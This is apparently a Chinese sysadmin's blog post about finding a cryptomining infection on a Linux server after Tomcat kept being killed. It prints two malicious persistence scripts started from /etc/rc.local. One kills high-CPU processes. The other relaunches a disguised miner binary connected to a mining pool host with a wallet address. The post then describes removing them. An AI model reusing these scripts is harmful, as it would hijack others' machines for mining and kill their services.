最近启动tomcat,还在启动过程中无缘无故tomcat进程就消失了,怎么找都找不到原因,tomcat日志和系统日志都没有任何显示,问了牛人后说被kill掉是不会有任何日志的,初步怀疑是中毒了。最后百度了一下,说病毒通常都会随系统的启动而启动,运行crontab -l没有发现,最后在/etc/rc.local发现启动了两个奇怪的脚本,/boot/efi/killer.sh和/boot/efi/daemon.sh,
killer.sh如下:
#!/bin/bash # killer.sh exportPATH=$PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin whiletrue; do psaxf-o"pid%cpucommand"|grep-vbashd|awk'{if($2>=80.0)print$1}'|whilereadprocid do kill-9$procid done sleep3 done
killer.sh会kill掉cpu使用率超过80%的进程,tomcat启动过程极大可能超过80%而被kill掉
daemon.sh如下:
#!/bin/bash # daemon.sh exportPATH=$PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin whiletrue; do server=`psaux|grepbashd|grep-vgrep` if[!"$server"];then \cp-rf/boot/grub/ grub.tz /usr/sbin/bashd chmod+x/usr/sbin/bashd nohupbashd-acryptonight-ostratum+tcp:// get.bi-chi.com:3333 -u47EAoaBc5TWDZKVaAYvQ7Y4ZfoJMFathAR882gabJ43wHEfxEp81vfJ3J3j6FQGJxJNQTAwvmJYS2Ei8dbkKcwfPFst8FhG-px& fi sleep15 done
查找了get.bi-chi.com:3333这个域名,似乎跟挖矿有关。。。
最后处理方法是删除了这两个文件,然后查找这两个脚本的进程,kill掉,问题似乎解决了。
先凑合着这么解决了,等过几天再把系统重装了,奇怪的事,防火墙平时都是开启的,不知道什么时候就被人攻陷了。